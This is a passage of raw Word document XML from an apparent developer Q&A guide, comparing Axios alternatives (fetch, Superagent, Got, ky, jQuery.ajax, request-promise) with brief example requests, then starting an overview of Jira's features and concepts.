    </w:p>
    <w:p w14:paraId="63CE5B32" w14:textId="057FAF1A"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3839" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B42353" w14:textId="6492E402" w:rsidR="00EA1B73" w:rsidRPr="00CE4B95" w:rsidRDefault="0027795D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="943" w:name="_Toc197868157"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an alternative to Axios</w:t>
      </w:r>
      <w:r w:rsidR="00EA1B73" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="943"/>
    </w:p>
    <w:p w14:paraId="2C0E3979" w14:textId="02A1DFF5" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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Here are some other popular alternatives to Axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEEAACE"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fetch() API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B5883"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Built-in</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native to JavaScript, so you don’t need to install any external libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F4B7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Promise-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns a Promise, making it easy to chain .then() and .catch() for handling responses and errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189FF99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built-in request/response transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike Axios, fetch() does not automatically parse JSON or transform request data, so you’ll need to manually call .json() or .text() on the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35EC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fetch()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF70A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5265D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 // Parses JSON response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16194C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63A09BA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23808F6B"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Superagent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160ABA5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r-friendly</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A popular HTTP client with a simple API, useful for making HTTP requests with additional features like file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C47F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both callbacks and promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82BC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48D3E2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superagent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2995F09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Superagent</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C11A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quest from 'superagent';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DCEA5" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6D526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get('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FF17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3D3C352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49D08CFC"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Got</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD7BA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Lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A powerful and smaller HTTP request library, mainly used in Node.js but can also be used in the browser with bundling tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CD8C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promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and comes with built-in retries and caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19545B5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5440589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got</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43947A9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Got</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FE0D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got from 'got';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1D78B" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A46F33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got('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EED91C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6AFE180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0EC4F69"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4. Fetch API with Axios alternatives (e.g., ky, node-fetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF2FA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A small, modern alternative to Axios that works with fetch() internally. It's simple to use, supports HTTP methods, and has built-in JSON handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC428E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de-fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lightweight implementation of fetch() for Node.js environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236317B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 for Ky</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B90A4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ky</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F2CD9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ky</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC5A9D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ky from 'ky';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391084DA" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C5757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ky.get('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3737262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json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF5F3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1DB3970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0DB65C5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5. jQuery.ajax()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280112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re using jQuery, the $.ajax() method provides a simple API for making HTTP requests. While not commonly used in modern React development, it’s still an option for legacy systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C22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jQuery.ajax()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C75D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jax({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1164C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rl: 'https://api.example.com/data',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35546F4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ype: 'GET',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CCA3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uccess: function (data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E272D6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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500668F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20F5CF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error: function (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D1B0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console.error(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72CD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1319967"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6D7064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6. Request-Promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521856A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 wrapper around request</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is deprecated now), used to simplify HTTP requests in Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC18A2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DDED90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request-promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2939DF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request-promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C97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request = require('request-promise');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D7215" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EE3BE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https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D40E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E2F769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DE48FBD" w14:textId="77777777" w:rsidR="00BE25FF"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97EB1">
          <v:rect id="_x0000_i3840" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="046B1131"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1A7F3BE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Built-in, native JavaScript API; lightweight, but requires more manual handling of responses and errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E28C74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eragent</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: User-friendly and provides additional functionality like file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71026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Got</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lightweight, supports retries and caching, great for Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1374D6B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Modern, small alternative to Axios built around fetch(), with a focus on simplicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E336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jQuery.ajax()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful for legacy projects but not recommended for modern React apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5BE3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quest-Promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A simplified wrapper around the request library, but request is deprecated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C03E9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For most modern React apps, </w:t>
      </w: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xml:space="preserve"> or </w:t>
      </w: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xml:space="preserve"> can be excellent alternatives to </w:t>
      </w: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depending on your needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE32FF8" w14:textId="5A13592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3841" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932AC95" w14:textId="17450860" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="004B26C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E32B" w14:textId="14655F5F" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="004B26C3" w:rsidP="004B26C3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="944" w:name="_Toc197868158"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Other</w:t>
      </w:r>
      <w:r w:rsidR="00204141" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="944"/>
    </w:p>
    <w:p w14:paraId="53B0FFD5" w14:textId="77777777" w:rsidR="001233E2" w:rsidRPr="00CE4B95" w:rsidRDefault="001233E2" w:rsidP="001233E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EDB6FF" w14:textId="09B3A8CD" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="00571FE1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="945" w:name="_Toc197868159"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Jira</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="945"/>
    </w:p>
    <w:p w14:paraId="1562ABC0" w14:textId="11656F02" w:rsidR="00564460" w:rsidRPr="00617E2C" w:rsidRDefault="0056446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ira</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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breakdown of Jira’s features and uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5907786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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3567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 Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38286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helps in tracking bugs, user stories, tasks, and other types of work items (known as "issues").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247210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ch issue has a lifecycle with states such as "To Do", "In Progress", "Done", etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72F0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 Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D388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teams to manage projects with detailed tracking. You can create projects for different teams or workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352FB8C8"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supports Agile methodologies (Scrum, Kanban) for managing development sprints, workflows, and backlogs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0994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Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1794798E"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crum boards</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for sprint planning and backlog grooming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36080ABD"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anban boards</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for continuous workflow management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D90D07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print and release management features, with detailed burndown charts and velocity tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679992CF"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tion</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1F089"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highly customizable. You can create custom workflows, issue types, fields, and screens to adapt the tool to your team’s specific processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249569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llaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F844C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collaborate through comments, attachments, and issue tracking, making it easier to communicate and resolve issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5973ED1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porting and Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5AB6C3"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provides detailed reporting and insights into the team's performance and project status, such as burndown charts, velocity charts, and release reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66222DE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tegration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4847F9A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ntegrates with various tools like Confluence (for documentation), Bitbucket (for version control), Slack, GitHub, and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41ED8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missions and Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5842877F"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granular control over permissions, so you can set who can view, edit, or transition issues. This ensures proper access control and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54EE1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mmon Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F228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g Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jira is often used by development teams to report, track, and resolve software bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151D63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sk Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Teams can create tasks, assign them to team members, and track progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237FDF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Project Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Using Scrum or Kanban boards, Jira helps Agile teams manage sprints, track progress, and visualize workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEFB55"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er Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some teams use Jira for managing customer support tickets, ensuring quick resolution and better visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECDC0D"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asic Concepts in Jira:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C28F0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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Every work item in Jira is referred to as an "issue," which could be a bug, task, feature, or user story.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6C5A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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jira allows you to create projects that define the type of work being tracked, such as software development or support.</w:t>
      </w:r>
